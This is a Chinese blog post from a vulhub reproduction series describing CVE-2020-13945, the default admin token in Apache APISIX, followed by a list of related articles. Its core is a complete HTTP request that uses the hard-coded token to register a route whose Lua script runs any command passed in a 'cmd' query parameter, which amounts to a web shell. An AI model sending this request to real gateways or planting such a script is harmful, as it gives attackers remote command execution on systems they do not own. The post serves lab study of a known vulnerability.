Apache APISIX 默认密钥漏洞(CVE-2020-13945)

于 2024-05-23 09:15:46 发布
阅读量393 收藏 10
点赞数 7
分类专栏: vulhub复现学习合集 文章标签: apache 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139134820
版权

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。

环境启动后,访问`http://your-ip:9080`即可查看到默认的404页面。

利用默认Token增加一个恶意的router,其中包含恶意LUA脚本

POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}

抓包构造恶意请求

然后,我们访问刚才添加的router,就可以通过cmd参数执行任意命令

shierbai
关注
专栏目录
Apache Apisix 安全漏洞(CVE-2020-13945)
千寻的博客
12-11 1719
Apache APISIX 中,用户启用了管理 API 并删除了管理 API 访问 IP 限制规则。最终,允许默认令牌访问 APISIX 管理数据。
Apache apisix默认密钥漏洞CVE-2020-13945
Bird&Bird
03-11 2014
Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX,从而控制APISIX网关。
Apache APISIX 默认密钥漏洞(CVE-2020-13945)
weixin_44047654的博客
11-30 935
Apache APISIX 默认密钥漏洞(CVE-2020-13945)
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能导致中间人攻击。在某些配置下,攻击者可能诱使客户端接受较弱的密钥交换算法,从而削弱通信的安全性。 2. CVE-2018-15473:这个漏洞涉及到...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache APISIX 的 Admin API 默认访问令牌漏洞CVE-2020-13945漏洞复现
weixin_56537388的博客
11-09 739
Apache APISIX 是一个动态、实时、高性能的 API 网关。Apache APISIX 有一个默认的内置 API 令牌,可用于访问所有 admin API,通过 2.x 版本中添加的参数导致远程执行 LUA 代码。
[ vulhub漏洞复现篇 ] Apache APISIX 默认密钥漏洞 CVE-2020-13945
qq_51577576的博客
10-18 1064
[ vulhub漏洞复现篇 ] Apache APISIX 默认密钥漏洞 CVE-2020-13945 Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
Apache APISIX默认密钥漏洞CVE-2020-13945
weixin_53639243的博客
02-21 344
Apache APISIX 是一个动态、实时、高性能的 API 网关。Apache APISIX 默认内置 API Token,可用于访问所有 admin API edd1c9f034335f136f87ad84b625c8f1 ,通过 2.x 版本中添加的 script 参数导致远程 LUA 代码执行。服务器启动后,您可以在 中看到默认的 404 页面。docker 启动环境。
复现vulhub中Apache APISIX 默认密钥漏洞CVE-2020-13945
最新发布
YX_zjp的博客
05-09 969
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。端口是9080,访问http://your-ip:9080/,返回404页面。利用默认Token增加一个恶意的router,其中包含恶意。系统:ubuntu20.04。
vulhub漏洞复现-Apache APISIX 默认密钥漏洞CVE-2020-13945
weixin_45095113的博客
12-21 673
vulhub漏洞复现-Apache APISIX 默认密钥漏洞CVE-2020-13945
Apache APISIX 默认密钥漏洞复现
Tauil的博客
07-31 2210
而check_conf中定义了一个script参数为lua文件类型执行,所以我们只需要将数据包按POST方式提交,并且在消息体中添加含有恶意lua代码的script参数。在其apisix/admin/routes.lua文件中,使用POST方式提交会将数据消息提交给check_conf。,在知道管理员密码的情况下我们可以通过构造一个恶意的router,其中包含恶意LUA脚本执行恶意命令。另外可以使用公开的POC进行漏洞利用,输入命令。打开vulhub,登录网址。,即可执行对应命令语句。...
Apache Apisix网关系统历史漏洞复现分析
道阻且长,行则将至。
02-18 2215
Apache APISIX 作为一个动态、实时、高性能的云原生 API 网关,提供了负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。本文总计、复现可 Apache APISIX 网关系统的几个历史 CVE 漏洞
漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)
Alone hackers的博客
03-07 7594
漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)
apache poi 各版本对应jdk
single_kity的博客
09-09 7953
apache poi 各版本对应jdk 最近因为poi和jdk的版本对应问题,遇到了一些糟心的事。在此先记录一下吧,以免以后遇到 之前一直没找到,百度了半天都没有找到相关的说明,好在在官网找到了这个(英文不好,找起来也费劲) 现在基本都是jdk1.8了,但是很多老的项目还在用1.8之前的jdk poi 版本 对应jdk版本 poi 4.x 1.8+ poi 3.11 和3.x 以后的版本 1.6+ poi 3.5 - poi 3.10 1.5+ poi 3.5 之前 1.4+
APISIX CVE-2020-13945漏洞复现
归零者的博客
11-12 181
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。
Apache Solr 2020安全漏洞CVE-13957:未经授权的上传与RCE风险
"CVE-2020-13957 是一个针对Apache Solr的安全漏洞,它涉及到未授权的文件上传。Apache Solr 是一个流行的全文搜索平台,其在处理用户提交的配置文件时存在潜在风险,特别是当这些文件被恶意利用时。该漏洞影响了多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值